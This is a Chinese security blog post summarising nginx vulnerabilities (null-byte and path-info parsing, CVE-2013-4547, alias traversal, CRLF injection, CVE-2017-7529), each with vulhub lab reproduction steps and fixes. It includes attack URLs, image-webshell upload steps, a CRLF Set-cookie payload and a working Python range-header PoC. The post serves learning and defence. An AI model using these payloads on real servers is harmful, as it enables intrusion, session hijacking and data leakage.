<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#00FFFF">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-corner-indicator.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#00FFFF">





  <meta name="keywords" content="中间件漏洞," />










<meta name="description" content="nginx中间件漏洞总结">
<meta name="keywords" content="中间件漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="nginx中间件漏洞总结">
<meta property="og:url" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;index.html">
<meta property="og:site_name" content="CyzCc&#39;s blog">
<meta property="og:description" content="nginx中间件漏洞总结">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595063866853.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595074072280.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595074228298.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595074214509.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595075451205.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595117496700.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595117545327.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595117810248.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595117868744.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595117912144.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595080941980.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595081434224.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595081463179.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595120714580.png">
<meta property="og:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595119335993.png">
<meta property="og:updated_time" content="2020-12-07T07:51:10.026Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;cyzcc.vip&#x2F;2020&#x2F;07&#x2F;19&#x2F;nginx%E4%B8%AD%E9%97%B4%E4%BB%B6&#x2F;1595063866853.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://cyzcc.vip/2020/07/19/nginx中间件/"/>




<!--留言-->

  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "9e261f4f"
    });
  daovoice('update');
  </script>


  <title>nginx中间件漏洞总结 | CyzCc's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">CyzCc's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">♫日常学习笔记整理♬♬</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-主页|随笔">
          <a href="/home/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            主页|随笔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-一些知识点">
          <a href="/guestbook/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-comments"></i> <br />
            
            一些知识点
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于我">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br />
            
            友链
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://cyzcc.vip/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="CyzCc">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CyzCc's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">nginx中间件漏洞总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-19T15:39:11+08:00">
                2020-07-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/" class="leancloud_visitors" data-flag-title="nginx中间件漏洞总结">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.9k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  7
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><strong>nginx中间件漏洞总结</strong></p>
<a id="more"></a>

<h1 id="空字节代码执行漏洞"><a href="#空字节代码执行漏洞" class="headerlink" title="空字节代码执行漏洞"></a><strong>空字节代码执行漏洞</strong></h1><h2 id="产生原因"><a href="#产生原因" class="headerlink" title="产生原因"></a><strong>产生原因</strong></h2><p>Ngnix在遇到%00空字节时与后端FastCGI处理不一致，导致可以在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php来执行其中的代码。</p>
<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a><strong>影响版本</strong></h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nginx 0.5.* </span><br><span class="line">nginx 0.6.* </span><br><span class="line">nginx 0.7 &lt;= 0.7.65 </span><br><span class="line">nginx 0.8 &lt;= 0.8.37</span><br></pre></td></tr></table></figure>

<h2 id="漏洞危害"><a href="#漏洞危害" class="headerlink" title="漏洞危害"></a><strong>漏洞危害</strong></h2><p>该漏洞可以使得入侵者绕过服务端waf的检测，进而getshell。</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>这里提供个打包好的Windows环境 Nginx 0.7.65+php 5.3.2 </p>
<p>链接：<a href="https://pan.baidu.com/s/1FUVJv9iFCcX9Qp5D5AMxKw" target="_blank" rel="noopener">https://pan.baidu.com/s/1FUVJv9iFCcX9Qp5D5AMxKw</a> </p>
<p>提取码：imdm </p>
<p>解压后，在Nginx目录下执行startup.bat ，然后在nginx-0.7.65/html/创建一个 含有PHP代码的jpg文件，访问xxx.jpg%00.php即可成功解析php代码</p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595063866853.png" alt="1595063866853"></p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a><strong>漏洞修复</strong></h2><p>升级nginx</p>
<h1 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="解析漏洞"></a><strong>解析漏洞</strong></h1><h2 id="产生原因-1"><a href="#产生原因-1" class="headerlink" title="产生原因"></a><strong>产生原因</strong></h2><p>当Nginx配置FastCGI使用PHP时，会将诸如<a href="http://www.secquan.org/test.jpg/anything.php" target="_blank" rel="noopener">http://www.secquan.org/test.jpg/anything.php</a> 这样的请 求,把test.jpg当作PHP文件来进行解析，而anything.php这个文件并不存在。实际上这并不是一个Nginx的漏洞， 而是PHP5默认配置的缺陷造成的。</p>
<p>当攻击者访问/info.jpg/xxx.php时， Nginx将查看URL，看到它以.php结尾，并将路径传递给PHP fastcgi处理程序。 PHP根据URL映射，在服务器上寻找xxx.php文件，但是xxx.php不存在，又由于cgi.fix_pathinfo默认是开启的，因此PHP 会继续检查路径中存在的文件，并将 多余的部分当作 PATH_INFO。接着PHP在文件系统中找到.jpg文件，而后以PHP的形式执行.jpg的内容，并将/xxx.php存储在 PATH_INFO 后丢弃，因此我们 在phpinfo中的$_SERVER[‘PATH_INFO’]看的到值为空。</p>
<p>常见的错误配置 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">server &#123; </span><br><span class="line">    location ~ \.php$ &#123; </span><br><span class="line">        root /work/www/test; </span><br><span class="line">        fastcgi_index index.php; </span><br><span class="line">        fastcgi_param SCRIPT_FILENAME</span><br><span class="line">    $document_root$fastcgi_script_name; </span><br><span class="line">        <span class="keyword">include</span> fastcgi_params; </span><br><span class="line">        fastcgi_pass unix:/tmp/php-fpm.sock; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="漏洞危害-1"><a href="#漏洞危害-1" class="headerlink" title="漏洞危害"></a><strong>漏洞危害</strong></h2><p>该漏洞可以使得入侵者绕过服务端waf的检测，进而getshell。</p>
<h2 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>使用docker搭建环境</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd vulhub/nginx/nginx_parsing_vulnerability/</span><br><span class="line">启动环境：</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>先上传一张图片马<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595074072280.png" alt="1595074072280"></p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595074228298.png" alt="1595074228298"></p>
<p>访问<code>uploadfiles/3019f422209a6593f02fad5560f36b79.gif/.php</code>，图片成功解析</p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595074214509.png" alt="1595074214509"></p>
<h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a><strong>漏洞修复</strong></h2><p><strong>cgi.fix_pathinfo</strong>:该选项默认开启，值为1，用于修理路径， 例如：当php遇到文件路径”/info.jpg/xxx.php/lxh.sec”时，若”/info.jpg/xxx.php/lxh.sec”不存在，则会去掉最后的”/lxh.sec”，然后判断”/info.jpg/xxx.php”是否存 在, 若存在则将/info.jpg/xxx.php当作文件/info.jpg/xxx.php/lxh.sec，若/info.jpg/xxx.php仍不存在，则继续去掉xxx.php,依此类推。</p>
<ul>
<li>关闭cgi.fifix_pathinfo，令cgi.fifix_pathinfo为0; </li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">修改配置文件vim /etc/php5/fpm/php.ini</span><br><span class="line"></span><br><span class="line">将cgi.fix_pathinfo=<span class="number">1</span>，设置为<span class="number">0</span></span><br><span class="line"></span><br><span class="line">修改配置文件vim /etc/php5/fpm/pool.d/www.conf</span><br><span class="line"></span><br><span class="line">将security.limit_extensions=，设置为：</span><br><span class="line"></span><br><span class="line">security.limit_extensions=.php，只允许php文件解析。</span><br></pre></td></tr></table></figure>

<ul>
<li><p>图片上传目录不给执行权限； </p>
</li>
<li><p>升级php-fpm、nginx; </p>
</li>
<li><p>安装相应的防护软件等等 </p>
</li>
</ul>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595075451205.png" alt="1595075451205"></p>
<h1 id="文件名逻辑漏洞"><a href="#文件名逻辑漏洞" class="headerlink" title="文件名逻辑漏洞"></a><strong>文件名逻辑漏洞</strong></h1><p><strong>CVE-2013-4547</strong></p>
<h2 id="漏洞产生"><a href="#漏洞产生" class="headerlink" title="漏洞产生"></a><strong>漏洞产生</strong></h2><p>nginx错误地解析了请求的URI，原本只有.php后缀的文件才会被发送给fastcgi解析,但是当cve-2013- 4547漏洞存在时，文件名 1.gif[0x20][0x00].php 也会被当做php解析。 </p>
<p><strong>影响版本：</strong>Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 </p>
<p><strong>漏洞危害：</strong>该解析漏洞可以使得入侵者绕过服务端waf的检测，进而getshell。 </p>
<h2 id="漏洞复现-2"><a href="#漏洞复现-2" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>使用docker搭建环境</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /vulhub-master/nginx/CVE<span class="number">-2013</span><span class="number">-4547</span></span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>1.上传一个含有php代码的图片<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595117496700.png" alt="1595117496700"></p>
<p>使用burp抓包，在文件名后面添加一个空格<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595117545327.png" alt="1595117545327"></p>
<p>访问该文件抓包，在文件名后添加++.php<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595117810248.png" alt="1595117810248"></p>
<p>在十六进制中找到两个连着的2b，并且将其依次改为20和00</p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595117868744.png" alt="1595117868744"></p>
<p>发包之后成功解析php代码<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595117912144.png" alt="1595117912144"></p>
<h2 id="漏洞修复-2"><a href="#漏洞修复-2" class="headerlink" title="漏洞修复"></a><strong>漏洞修复</strong></h2><ul>
<li><p>图片上传目录不给执行权限； </p>
</li>
<li><p>升级nginx </p>
</li>
<li><p>安装防护软件</p>
</li>
<li><p>设置security.limit_extensions = .php </p>
</li>
</ul>
<h1 id="目录穿越漏洞"><a href="#目录穿越漏洞" class="headerlink" title="目录穿越漏洞"></a><strong>目录穿越漏洞</strong></h1><h2 id="漏洞产生-1"><a href="#漏洞产生-1" class="headerlink" title="漏洞产生"></a><strong>漏洞产生</strong></h2><p>Nginx在配置别名（Alias）的时候，如果忘记加<code>/</code>，将造成一个目录穿越漏洞。 </p>
<h2 id="漏洞危害-2"><a href="#漏洞危害-2" class="headerlink" title="漏洞危害"></a><strong>漏洞危害</strong></h2><p>导致敏感信息泄露，任意文件下载等等。 </p>
<h2 id="漏洞复现-3"><a href="#漏洞复现-3" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>直接使用docker搭建的漏洞环境。 </p>
<p><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-confifiguration.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/nginx-insecure-confifiguration.html</a> </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /vulhub-master/nginx/insecure-configuration</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>直接访问url：<a href="http://192.168.102.128:8081/即可" target="_blank" rel="noopener">http://192.168.102.128:8081/即可</a></p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595080941980.png" alt="1595080941980"></p>
<p>接着访问/files/发现目录遍历<br><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595081434224.png" alt="1595081434224"></p>
<p>访问/files../成功穿越目录到服务器根目录</p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595081463179.png" alt="1595081463179"></p>
<p>可下载一些敏感文件</p>
<h2 id="漏洞修复-3"><a href="#漏洞修复-3" class="headerlink" title="漏洞修复"></a><strong>漏洞修复</strong></h2><p>Nginx在配置别名（Alias）的时候，记得加/，如下： </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location /files/ &#123;</span><br><span class="line">    alias /home/; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="CRLF注入漏洞"><a href="#CRLF注入漏洞" class="headerlink" title="CRLF注入漏洞"></a><strong>CRLF注入漏洞</strong></h1><h2 id="漏洞产生-2"><a href="#漏洞产生-2" class="headerlink" title="漏洞产生"></a><strong>漏洞产生</strong></h2><p>Nginx会将 $uri 进行解码，导致传入%0a%0d即可引入换行符，造成CRLF注入漏洞。错误的配置文件 </p>
<p>示例（原本的目的是为了让http的请求跳转到https上）： </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location / &#123; </span><br><span class="line">    <span class="keyword">return</span> <span class="number">302</span> https:<span class="comment">//$host$uri;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="漏洞危害-3"><a href="#漏洞危害-3" class="headerlink" title="漏洞危害"></a><strong>漏洞危害</strong></h2><p> 劫持合法用户会话，利用管理员身份进行恶意操作，篡改页面内容、进一步渗透网站；等等 </p>
<p> <strong>利用CRLF Injection设置一个SESSION,造成一个“会话固定漏洞”</strong></p>
<p>原理：session固定漏洞最为核心的其实应该是程序使用session作为认证方式，但又放开了session_id的设置，并且设置session_id在session_starts()执行之后，session_id以key/value的形式指定了后端使用哪个session。</p>
<p>1.Attacker先打开一个网站<a href="http://www.baidu.com" target="_blank" rel="noopener">http://www.baidu.com</a>，然后服务器会回复他一个session id。比如SID=abcdefg。Attacker把这个id记下了。 </p>
<p>2.Attacker给UserA发送一个电子邮件，他假装是什么推销什么，诱导UserA点击链接<a href="http://unsafe/?SID=abcdefg" target="_blank" rel="noopener">http://unsafe/?SID=abcdefg</a>，SID后面是Attacker自己的session id。 </p>
<p>3.UserA被吸引了，点击了<a href="http://unsafe/?SID=abcdefg" target="_blank" rel="noopener">http://unsafe/?SID=abcdefg</a>，像往常一样，输入了自己的帐号和口令从而登录到银行网站。 </p>
<p>4.因为服务器的session id不改变，现在Attacker点击<a href="http://unsafe/?SID=abcdefg" target="_blank" rel="noopener">http://unsafe/?SID=abcdefg</a>后，他就拥有了Alice的身份。可以为所欲为了。</p>
<h2 id="漏洞复现-4"><a href="#漏洞复现-4" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>在之前挖洞的时候通过xray扫到过该漏洞</p>
<p>直接构造：<a href="https://xxxxxx/file_post/display/openedudl.php?SrcPath=%0aSet-cookie:JSPSESSID%3D9999999999999&amp;Tag=1577835999即可构造一个session" target="_blank" rel="noopener">https://xxxxxx/file_post/display/openedudl.php?SrcPath=%0aSet-cookie:JSPSESSID%3D9999999999999&amp;Tag=1577835999即可构造一个session</a></p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595120714580.png" alt="1595120714580"></p>
<p>修复建议</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location / &#123; </span><br><span class="line">	<span class="keyword">return</span> <span class="number">302</span> https:<span class="comment">//$host$request_uri; </span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="越界读取缓存漏洞"><a href="#越界读取缓存漏洞" class="headerlink" title="越界读取缓存漏洞"></a><strong>越界读取缓存漏洞</strong></h1><h2 id="漏洞产生-3"><a href="#漏洞产生-3" class="headerlink" title="漏洞产生"></a><strong>漏洞产生</strong></h2><p>当使用Nginx标准模块时，攻击者可以通过发送包含恶意构造range域的header请求，来获取响应中的 缓存文件头部信息。在某些配置中，缓存文件头可能包含后端服务器的IP地址或其它敏感信息，从而导致信息泄 露。 </p>
<p><strong>漏洞影响版本：</strong>该漏洞影响所有0.5.6 - 1.13.2版本内默认配置模块的Nginx只需要开启缓存。 </p>
<p><strong>漏洞危害：</strong>攻击者可以构造特定的header头字段，能越界读取到缓存文件的头信息，而头信息中可能会包含nginx 代理站点的真实ip或是其他敏感信息 </p>
<h2 id="漏洞复现-5"><a href="#漏洞复现-5" class="headerlink" title="漏洞复现"></a><strong>漏洞复现</strong></h2><p>直接使用docker搭建的漏洞环境。 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /vulhub-master/nginx/CVE<span class="number">-2017</span><span class="number">-7529</span></span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>1，访问 <a href="http://192.168.102.128:8080/" target="_blank" rel="noopener">http://192.168.102.128:8080/</a> ，即可查看到Nginx默认页面</p>
<p>2，调用 python3 poc.py <a href="http://192.168.102.128:8080/" target="_blank" rel="noopener">http://192.168.102.128:8080/</a> ，读取返回结果</p>
<p><img src="/2020/07/19/nginx%E4%B8%AD%E9%97%B4%E4%BB%B6/1595119335993.png" alt="1595119335993"></p>
<p>poc.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">    print(<span class="string">"%s url"</span> % (sys.argv[<span class="number">0</span>]))</span><br><span class="line">    print(<span class="string">"eg: python %s http://your-ip:8080/"</span> % (sys.argv[<span class="number">0</span>]))</span><br><span class="line">    sys.exit()</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">'User-Agent'</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"</span></span><br><span class="line">&#125;</span><br><span class="line">offset = <span class="number">605</span></span><br><span class="line">url = sys.argv[<span class="number">1</span>]</span><br><span class="line">file_len = len(requests.get(url, headers=headers).content)</span><br><span class="line">n = file_len + offset</span><br><span class="line">headers[<span class="string">'Range'</span>] = <span class="string">"bytes=-%d,-%d"</span> % (n, <span class="number">0x8000000000000000</span> - n)</span><br><span class="line"></span><br><span class="line">r = requests.get(url, headers=headers)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>

